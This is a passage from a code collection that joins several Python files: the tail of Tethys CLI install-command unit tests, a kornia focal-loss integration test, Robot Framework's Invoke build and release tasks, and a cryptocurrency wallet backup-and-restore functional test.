mock_customsetting = mock.MagicMock(value=1)
mock_customsetting.save.side_effect = ValidationError('error')
mock_customsettings.objects.get.return_value = mock_customsetting
install_commands.configure_services(services, app_name)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn(f'Incorrect value type given for custom setting \'{custom_setting_name}\'', po_call_args[0][0][0])
mock_find_and_link.assert_called_with('persistent', persistent_setting_name,
persistent_service_name, app_name)
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_portal_install_path_none(self, mock_os, _):
mock_os.path.exists.return_value = False
self.assertFalse(install_commands.run_portal_install(None, 'foo'))
@mock.patch('tethys_apps.cli.install_commands.configure_services')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.open_file')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_portal_install(self, mock_os, mock_open_file, mock_pretty_output, mock_configure_services):
app_name = 'foo'
services = {'persistent': {'test_setting': 'test_service'}}
portal_options_services = {'apps': {app_name: {'services': services}}}
portal_options_empty_services = {'apps': {app_name: {'services': ''}}}
portal_options_no_services = {'apps': {app_name: ''}}
mock_open_file.side_effect = [portal_options_services, portal_options_empty_services,
portal_options_no_services]
mock_os.path.exists.return_value = True
self.assertTrue(install_commands.run_portal_install(None, app_name))
mock_configure_services.assert_called_with(services, app_name)
self.assertFalse(install_commands.run_portal_install(None, app_name))
self.assertFalse(install_commands.run_portal_install(None, app_name))
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn(f'No app configuration found for app: {app_name}', po_call_args[2][0][0])
self.assertIn('No apps configuration found in portal config file.', po_call_args[4][0][0])
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_services_path_none(self, mock_os, mock_pretty_output):
args = mock.MagicMock(services_file=None)
mock_os.path.exists.return_value = False
install_commands.run_services('foo', args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual('No Services file found.', po_call_args[0][0][0])
@mock.patch('tethys_apps.cli.install_commands.configure_services')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('tethys_apps.cli.install_commands.open_file')
@mock.patch('tethys_apps.cli.install_commands.os')
def test_run_services(self, mock_os, mock_open_file, mock_pretty_output, _):
args = mock.MagicMock(services_file='services_file')
mock_os.path.exists.return_value = True
mock_open_file.side_effect = ['service_file', '']
install_commands.run_services('foo', args)
install_commands.run_services('foo', args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual('No Services listed in Services file.', po_call_args[0][0][0])
class TestInstallCommands(TestCase):
def setUp(self):
from tethys_apps.models import TethysApp
self.src_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
self.root_app_path = os.path.join(self.src_dir, 'apps', 'tethysapp-test_app')
self.app_model = TethysApp(
name='test_app',
package='test_app'
)
self.app_model.save()
pass
def tearDown(self):
self.app_model.delete()
pass
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('builtins.input', side_effect=['x', 'n'])
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.install_commands.call')
def test_install_file_not_generate(self, mock_call, mock_exit, _, __):
args = mock.MagicMock(file=None, quiet=False)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
self.assertEqual(3, len(mock_call.call_args_list))
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
@mock.patch('builtins.input', side_effect=['y'])
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.exit')
def test_install_file_generate(self, mock_exit, mock_call, _, __):
args = mock.MagicMock(file=None, quiet=False)
check_call = ['tethys', 'gen', 'install']
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
mock_call.assert_called_with(check_call)
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_no_conda_input_file(self, mock_pretty_output, mock_exit, _, __):
file_path = os.path.join(self.root_app_path, 'install-no-dep.yml')
args = mock.MagicMock(file=file_path, verbose=False)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Running application install....", po_call_args[0][0][0])
self.assertIn("Quiet mode: No additional service setting validation will be performed.", po_call_args[1][0][0])
self.assertIn("Services Configuration Completed.", po_call_args[2][0][0])
self.assertIn("Skipping syncstores.", po_call_args[3][0][0])
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_input_file_with_post(self, mock_pretty_output, mock_exit, _, __):
file_path = os.path.join(self.root_app_path, 'install-with-post.yml')
args = mock.MagicMock(file=file_path, verbose=False)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Running application install....", po_call_args[1][0][0])
self.assertIn("Quiet mode: No additional service setting validation will be performed.", po_call_args[2][0][0])
self.assertIn("Services Configuration Completed.", po_call_args[3][0][0])
self.assertIn("Skipping syncstores.", po_call_args[4][0][0])
self.assertIn("Running post installation tasks...", po_call_args[5][0][0])
self.assertIn("Post Script Result: b'test\\n'", po_call_args[6][0][0])
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.run_sync_stores')
@mock.patch('tethys_apps.cli.install_commands.run_interactive_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.run_portal_install', return_value=False)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_skip_input_file(self, mock_pretty_output, mock_exit, _, __, ___, ____, _____, ______):
file_path = os.path.join(self.root_app_path, 'install-skip-setup.yml')
mock_exit.side_effect = SystemExit
args = mock.MagicMock(file=file_path, verbose=False)
self.assertRaises(SystemExit, install_commands.install_command, args)
args = mock.MagicMock(file=file_path, develop=False)
self.assertRaises(SystemExit, install_commands.install_command, args)
args = mock.MagicMock(file=file_path, verbose=False, develop=False, force_services=False, quiet=False,
no_sync=False)
self.assertRaises(SystemExit, install_commands.install_command, args)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual("Skipping package installation, Skip option found.", po_call_args[0][0][0])
mock_exit.assert_called_with(0)
@mock.patch('tethys_apps.cli.install_commands.run_services')
@mock.patch('tethys_apps.cli.install_commands.call')
@mock.patch('tethys_apps.cli.install_commands.conda_run', return_value=['', '', 1])
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_conda_and_pip_package_install(self, mock_pretty_output, mock_exit, mock_conda_run, mock_call, _):
file_path = os.path.join(self.root_app_path, 'install-dep.yml')
args = mock.MagicMock(file=file_path, develop=False, verbose=False, services_file=None)
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.install_command, args)
mock_conda_run.assert_called_with(Commands.INSTALL, '-c', 'tacaswell', 'geojson', use_exception_handler=False,
stdout=None, stderr=None)
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertEqual("Running conda installation tasks...", po_call_args[0][0][0])
self.assertIn("Warning: Packages installation ran into an error.", po_call_args[1][0][0])
self.assertEqual("Running pip installation tasks...", po_call_args[2][0][0])
self.assertEqual("Running application install....", po_call_args[3][0][0])
self.assertEqual("Quiet mode: No additional service setting validation will be performed.",
po_call_args[4][0][0])
self.assertEqual("Services Configuration Completed.", po_call_args[5][0][0])
self.assertEqual(['pip', 'install', 'see'], mock_call.mock_calls[0][1][0])
self.assertEqual(['python', 'setup.py', 'clean', '--all'], mock_call.mock_calls[1][1][0])
self.assertEqual(['python', 'setup.py', 'install'], mock_call.mock_calls[2][1][0])
self.assertEqual(['tethys', 'manage', 'sync'], mock_call.mock_calls[3][1][0])
mock_exit.assert_called_with(0)
@mock.patch('builtins.input', side_effect=['x', 5])
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_custom_setting_set(self, mock_pretty_output, mock_get_settings, _):
mock_cs = mock.MagicMock()
mock_cs.name = 'mock_cs'
mock_cs.save.side_effect = [ValidationError('error'), mock.DEFAULT]
mock_get_settings.return_value = {'unlinked_settings': [mock_cs]}
install_commands.run_interactive_services('foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_cs", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("Enter the desired value", po_call_args[4][0][0])
self.assertIn("Incorrect value type", po_call_args[5][0][0])
self.assertIn("Enter the desired value", po_call_args[6][0][0])
self.assertEqual(mock_cs.name + " successfully set with value: 5.", po_call_args[7][0][0])
@mock.patch('builtins.input', side_effect=[''])
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_custom_setting_skip(self, mock_pretty_output, mock_get_settings, _):
mock_cs = mock.MagicMock()
mock_cs.name = 'mock_cs'
mock_get_settings.return_value = {'unlinked_settings': [mock_cs]}
install_commands.run_interactive_services('foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_cs", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("Enter the desired value", po_call_args[4][0][0])
self.assertEqual(f"Skipping setup of {mock_cs.name}", po_call_args[5][0][0])
@mock.patch('builtins.input', side_effect=KeyboardInterrupt)
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_custom_setting_interrupt(self, mock_pretty_output, mock_get_settings, mock_exit, _):
mock_cs = mock.MagicMock()
mock_cs.name = 'mock_cs'
mock_get_settings.return_value = {'unlinked_settings': [mock_cs]}
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.run_interactive_services, 'foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_cs", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("Enter the desired value", po_call_args[4][0][0])
self.assertEqual("\nInstall Command cancelled.", po_call_args[5][0][0])
mock_exit.assert_called_with(0)
@mock.patch('builtins.input', side_effect=['1', '1', '', KeyboardInterrupt])
@mock.patch('tethys_apps.cli.install_commands.get_setting_type', return_value='persistent')
@mock.patch('tethys_apps.cli.install_commands.get_service_from_id', side_effect=ValueError)
@mock.patch('tethys_apps.cli.install_commands.get_service_from_name', side_effect=[False, {'service_type': 'st',
'linkParam': 'lp'}])
@mock.patch('tethys_apps.cli.install_commands.exit')
@mock.patch('tethys_apps.cli.install_commands.services_list_command')
@mock.patch('tethys_apps.cli.install_commands.get_app_settings')
@mock.patch('tethys_apps.cli.install_commands.link_service_to_app_setting')
@mock.patch('tethys_apps.cli.cli_colors.pretty_output')
def test_interactive_service_setting_all(self, mock_pretty_output, mock_lstas, mock_get_settings, mock_slc,
mock_exit, ____, ___, __, _):
mock_ss = mock.MagicMock()
del mock_ss.value
mock_ss.name = 'mock_ss'
mock_ss.save.side_effect = [ValidationError('error'), mock.DEFAULT]
mock_get_settings.return_value = {'unlinked_settings': [mock_ss, mock_ss, mock_ss, mock_ss]}
mock_s = mock.MagicMock()
mock_slc.side_effect = [[[]], [[mock_s]], [[mock_s]], [[mock_s]]]
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, install_commands.run_interactive_services, 'foo')
po_call_args = mock_pretty_output().__enter__().write.call_args_list
self.assertIn("Configuring mock_ss", po_call_args[2][0][0])
self.assertIn("Type", po_call_args[3][0][0])
self.assertIn("No compatible services found.", po_call_args[4][0][0])
self.assertIn("Enter the service ID/Name", po_call_args[7][0][0])
self.assertIn("Incorrect service ID/Name.", po_call_args[8][0][0])
self.assertIn("Enter the service ID/Name", po_call_args[9][0][0])
self.assertIn(f"Skipping setup of {mock_ss.name}", po_call_args[13][0][0])
self.assertEqual("\nInstall Command cancelled.", po_call_args[17][0][0])
mock_lstas.assert_called_with('st', '1', 'foo', 'lp', 'mock_ss')
mock_exit.assert_called_with(0)
def test_get_setting_type(self):
from tethys_apps.models import PersistentStoreDatabaseSetting
self.assertEqual('persistent', install_commands.get_setting_type(PersistentStoreDatabaseSetting()))
| 52.559395 | 120 | 0.707253 | ["BSD-2-Clause"] | Aquaveo/tethys | tests/unit_tests/test_tethys_apps/test_cli/test_install_commands.py | 24335 | Python
import logging
import pytest
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import kornia as kornia
logger = logging.getLogger(__name__)
class TestIntegrationFocalLoss:
# optimization
thresh = 1e-1
lr = 1e-3
num_iterations = 1000
num_classes = 2
# focal loss
alpha = 2.0
gamma = 2.0
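    # Reference note (added): with these settings the criterion used below
    # minimises the standard focal loss,
    #   FL(p_t) = -alpha * (1 - p_t)**gamma * log(p_t),
    # where gamma down-weights already well-classified pixels.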
def generate_sample(self, base_target, std_val=0.1):
target = base_target.float() / base_target.max()
noise = std_val * torch.rand(1, 1, 6, 5)
return target + noise
@staticmethod
def init_weights(m):
if isinstance(m, nn.Conv2d):
torch.nn.init.xavier_uniform_(m.weight)
def test_conv2d_relu(self):
# we generate base sample
target = torch.LongTensor(1, 6, 5).fill_(0)
for i in range(1, self.num_classes):
target[..., i:-i, i:-i] = i
m = nn.Sequential(
nn.Conv2d(1, self.num_classes, kernel_size=3, padding=1),
nn.ReLU(True),
)
m.apply(self.init_weights)
optimizer = optim.Adam(m.parameters(), lr=self.lr)
criterion = kornia.losses.FocalLoss(
alpha=self.alpha, gamma=self.gamma, reduction='mean')
# NOTE: uncomment to compare against vanilla cross entropy
# criterion = nn.CrossEntropyLoss()
for iter_id in range(self.num_iterations):
sample = self.generate_sample(target)
output = m(sample)
loss = criterion(output, target)
logger.debug("Loss: {}".format(loss.item()))
optimizer.zero_grad()
loss.backward()
optimizer.step()
sample = self.generate_sample(target)
output_argmax = torch.argmax(m(sample), dim=1)
logger.debug("Output argmax: \n{}".format(output_argmax))
# TODO(edgar): replace by IoU or find a more stable solution
# for this test. The issue is that depending on
# the seed to initialize the weights affects the
# final results and slows down the convergence of
# the algorithm.
val = F.mse_loss(output_argmax.float(), target.float())
if not val.item() < self.thresh:
pytest.xfail("Wrong seed or initial weight values.")
| 30.736842 | 70 | 0.602312 | ["Apache-2.0"] | BloodAxe/kornia | test/integration/test_focal.py | 2336 | Python
"""Tasks to help Robot Framework packaging and other development.
Executed by Invoke <http://pyinvoke.org>. Install it with `pip install invoke`
and run `invoke --help` and `invoke --list` for details how to execute tasks.
See BUILD.rst for packaging and releasing instructions.
"""
from pathlib import Path
from urllib.request import urlretrieve
import os
import shutil
import sys
import tarfile
import tempfile
import zipfile
assert Path.cwd().resolve() == Path(__file__).resolve().parent
sys.path.insert(0, 'src')
from invoke import Exit, task
from rellu import initialize_labels, ReleaseNotesGenerator, Version
from rellu.tasks import clean
from robot.libdoc import libdoc
REPOSITORY = 'robotframework/robotframework'
VERSION_PATH = Path('src/robot/version.py')
VERSION_PATTERN = "VERSION = '(.*)'"
POM_PATH = Path('pom.xml')
POM_VERSION_PATTERN = '<version>(.*)</version>'
RELEASE_NOTES_PATH = Path('doc/releasenotes/rf-{version}.rst')
RELEASE_NOTES_TITLE = 'Robot Framework {version}'
RELEASE_NOTES_INTRO = '''
`Robot Framework`_ {version} is a new release with **UPDATE** enhancements
and bug fixes. **MORE intro stuff...**
**REMOVE reference to tracker if release notes contain all issues.**
All issues targeted for Robot Framework {version.milestone} can be found
from the `issue tracker milestone`_.
Questions and comments related to the release can be sent to the
`robotframework-users`_ mailing list or to `Robot Framework Slack`_,
and possible bugs submitted to the `issue tracker`_.
**REMOVE ``--pre`` from the next command with final releases.**
If you have pip_ installed, just run
::
pip install --pre --upgrade robotframework
to install the latest available release or use
::
pip install robotframework=={version}
to install exactly this version. Alternatively you can download the source
distribution from PyPI_ and install it manually. For more details and other
installation approaches, see the `installation instructions`_.
Robot Framework {version} was released on {date}.
.. _Robot Framework: http://robotframework.org
.. _pip: http://pip-installer.org
.. _PyPI: https://pypi.python.org/pypi/robotframework
.. _issue tracker milestone: https://github.com/robotframework/robotframework/issues?q=milestone%3A{version.milestone}
.. _issue tracker: https://github.com/robotframework/robotframework/issues
.. _robotframework-users: http://groups.google.com/group/robotframework-users
.. _Robot Framework Slack: https://robotframework-slack-invite.herokuapp.com
.. _installation instructions: ../../INSTALL.rst
'''
@task
def set_version(ctx, version):
"""Set project version in `src/robot/version.py`` file.
Args:
version: Project version to set or ``dev`` to set development version.
Following PEP-440 compatible version numbers are supported:
- Final version like 3.0 or 3.1.2.
- Alpha, beta or release candidate with ``a``, ``b`` or ``rc`` postfix,
respectively, and an incremented number like 3.0a1 or 3.0.1rc1.
- Development version with ``.dev`` postix and an incremented number like
3.0.dev1 or 3.1a1.dev2.
When the given version is ``dev``, the existing version number is updated
to the next suitable development version. For example, 3.0 -> 3.0.1.dev1,
3.1.1 -> 3.1.2.dev1, 3.2a1 -> 3.2a2.dev1, 3.2.dev1 -> 3.2.dev2.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
version.write()
pom = Version(str(version), POM_PATH, POM_VERSION_PATTERN)
pom.write()
print(version)
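# Example invocations (illustrative; the version numbers are arbitrary):
#
#   invoke set-version 3.1a1   # set an explicit pre-release version
#   invoke set-version dev     # bump to the next development version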
@task
def print_version(ctx):
"""Print the current project version."""
print(Version(path=VERSION_PATH, pattern=VERSION_PATTERN))
@task
def library_docs(ctx, name):
"""Generate standard library documentation.
Args:
name: Name of the library or ``all`` to generate docs for all libs.
Name is case-insensitive and can be shortened as long as it
is a unique prefix. For example, ``b`` is equivalent to
``BuiltIn`` and ``di`` equivalent to ``Dialogs``.
"""
libraries = ['BuiltIn', 'Collections', 'DateTime', 'Dialogs',
'OperatingSystem', 'Process', 'Screenshot', 'String',
'Telnet', 'XML']
name = name.lower()
if name != 'all':
libraries = [lib for lib in libraries if lib.lower().startswith(name)]
if len(libraries) != 1:
raise Exit(f"'{name}' is not a unique library prefix.")
for lib in libraries:
libdoc(lib, str(Path(f'doc/libraries/{lib}.html')))
@task
def release_notes(ctx, version=None, username=None, password=None, write=False):
"""Generate release notes based on issues in the issue tracker.
Args:
version: Generate release notes for this version. If not given,
generated them for the current version.
username: GitHub username.
password: GitHub password.
write: When set to True, write release notes to a file overwriting
possible existing file. Otherwise just print them to the
terminal.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively. If they aren't
specified at all, communication with GitHub is anonymous and typically
pretty slow.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
file = RELEASE_NOTES_PATH if write else sys.stdout
generator = ReleaseNotesGenerator(REPOSITORY, RELEASE_NOTES_TITLE,
RELEASE_NOTES_INTRO)
generator.generate(version, username, password, file)
@task
def init_labels(ctx, username=None, password=None):
"""Initialize project by setting labels in the issue tracker.
Args:
username: GitHub username.
password: GitHub password.
Username and password can also be specified using ``GITHUB_USERNAME`` and
``GITHUB_PASSWORD`` environment variable, respectively.
Should only be executed once when taking ``rellu`` tooling to use or
when labels it uses have changed.
"""
initialize_labels(REPOSITORY, username, password)
@task
def jar(ctx, jython_version='2.7.0', pyyaml_version='3.11', remove_dist=False):
"""Create JAR distribution.
Downloads Jython JAR and PyYAML if needed.
Args:
jython_version: Jython version to use as a base. Must match version in
`jython-standalone-<version>.jar` found from Maven central.
pyyaml_version: Version of PyYAML that will be included in the
standalone jar. The version must be available from PyPI.
        remove_dist: Controls whether the 'dist' directory is removed before building.
"""
clean(ctx, remove_dist, create_dirs=True)
jython_jar = get_jython_jar(jython_version)
print(f"Using '{jython_jar}'.")
compile_java_files(ctx, jython_jar)
unzip_jar(jython_jar)
copy_robot_files()
pyaml_archive = get_pyyaml(pyyaml_version)
extract_and_copy_pyyaml_files(pyyaml_version, pyaml_archive)
compile_python_files(ctx, jython_jar)
version = Version(path=VERSION_PATH, pattern=VERSION_PATTERN)
create_robot_jar(ctx, str(version))
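# Example (illustrative): build the standalone JAR with the default Jython and
# PyYAML versions, clearing any previous 'dist' directory first:
#
#   invoke jar --remove-dist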
def get_jython_jar(version):
filename = 'jython-standalone-{0}.jar'.format(version)
url = (f'http://search.maven.org/remotecontent?filepath=org/python/'
f'jython-standalone/{version}/{filename}')
return get_extlib_file(filename, url)
def get_pyyaml(version):
filename = f'PyYAML-{version}.tar.gz'
url = f'https://pypi.python.org/packages/source/P/PyYAML/{filename}'
return get_extlib_file(filename, url)
def get_extlib_file(filename, url):
lib = Path('ext-lib')
path = Path(lib, filename)
if path.exists():
return path
print(f"'{filename}' not found, downloading it from '{url}'.")
lib.mkdir(exist_ok=True)
urlretrieve(url, path)
return path
def extract_and_copy_pyyaml_files(version, filename, build_dir='build'):
extracted = Path(tempfile.gettempdir(), 'pyyaml-for-robot')
if extracted.is_dir():
shutil.rmtree(str(extracted))
print(f"Extracting '{filename}' to '{extracted}'.")
with tarfile.open(filename) as t:
t.extractall(extracted)
source = Path(extracted, f'PyYAML-{version}', 'lib', 'yaml')
target = Path(build_dir, 'Lib', 'yaml')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
def compile_java_files(ctx, jython_jar, build_dir='build'):
root = Path('src/java/org/robotframework')
files = [str(path) for path in root.iterdir() if path.suffix == '.java']
print(f'Compiling {len(files)} Java files.')
ctx.run(f"javac -d {build_dir} -target 1.7 -source 1.7 -cp {jython_jar} "
f"{' '.join(files)}")
def unzip_jar(path, target='build'):
zipfile.ZipFile(path).extractall(target)
def copy_robot_files(build_dir='build'):
source = Path('src', 'robot')
target = Path(build_dir, 'Lib', 'robot')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
shutil.rmtree(str(Path(target, 'htmldata', 'testdata')))
def compile_python_files(ctx, jython_jar, build_dir='build'):
ctx.run(f"java -jar {jython_jar} -m compileall -x '.*3.py' {build_dir}")
# Jython will not work without its py-files, but robot will
for directory, _, files in os.walk(str(Path(build_dir, 'Lib', 'robot'))):
for name in files:
if name.endswith('.py'):
Path(directory, name).unlink()
def create_robot_jar(ctx, version, source='build'):
write_manifest(version, source)
target = Path(f'dist/robotframework-{version}.jar')
ctx.run(f'jar cvfM {target} -C {source} .')
print(f"Created '{target}'.")
def write_manifest(version, build_dir='build'):
with open(Path(build_dir, 'META-INF', 'MANIFEST.MF'), 'w') as mf:
mf.write(f'''\
Manifest-Version: 1.0
Main-Class: org.robotframework.RobotFramework
Specification-Version: 2
Implementation-Version: {version}
''')
| 36.23741 | 118 | 0.694163 | ["ECL-2.0", "Apache-2.0"] | ConradDjedjebi/robotframework | tasks.py | 10074 | Python
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet backup features.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from decimal import Decimal
import os
from random import randint
import shutil
from test_framework.test_framework import AgroCoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class WalletBackupTest(AgroCoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
# nodes 1, 2,3 are spenders, let's give them a keypool=100
# whitelist all peers to speed up tx relay / mempool sync
self.extra_args = [
["[email protected]", "-keypool=100"],
["[email protected]", "-keypool=100"],
["[email protected]", "-keypool=100"],
["[email protected]"],
]
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
self.sync_all()
def one_send(self, from_node, to_address):
if (randint(1,2) == 1):
amount = Decimal(randint(1,10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
self.sync_mempools()
self.nodes[3].generate(1)
self.sync_blocks()
# As above, this mirrors the original bash test.
def start_three(self, args=()):
self.start_node(0, self.extra_args[0] + list(args))
self.start_node(1, self.extra_args[1] + list(args))
self.start_node(2, self.extra_args[2] + list(args))
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
def stop_three(self):
self.stop_node(0)
self.stop_node(1)
self.stop_node(2)
def erase_three(self):
os.remove(os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
def init_three(self):
self.init_wallet(0)
self.init_wallet(1)
self.init_wallet(2)
def run_test(self):
self.log.info("Generating initial blockchain")
self.nodes[0].generate(1)
self.sync_blocks()
self.nodes[1].generate(1)
self.sync_blocks()
self.nodes[2].generate(1)
self.sync_blocks()
self.nodes[3].generate(100)
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
self.log.info("Creating transactions")
# Five rounds of sending each other transactions.
for _ in range(5):
self.do_one_round()
self.log.info("Backing up")
self.nodes[0].backupwallet(os.path.join(self.nodes[0].datadir, 'wallet.bak'))
self.nodes[1].backupwallet(os.path.join(self.nodes[1].datadir, 'wallet.bak'))
self.nodes[2].backupwallet(os.path.join(self.nodes[2].datadir, 'wallet.bak'))
if not self.options.descriptors:
self.nodes[0].dumpwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].dumpwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].dumpwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.log.info("More transactions")
for _ in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
self.log.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
# Restore wallets from backup
shutil.copyfile(os.path.join(self.nodes[0].datadir, 'wallet.bak'), os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[1].datadir, 'wallet.bak'), os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[2].datadir, 'wallet.bak'), os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
self.log.info("Re-starting nodes")
self.start_three()
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if not self.options.descriptors:
self.log.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
#start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
self.start_three(["-nowallet"])
self.init_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].importwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].importwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
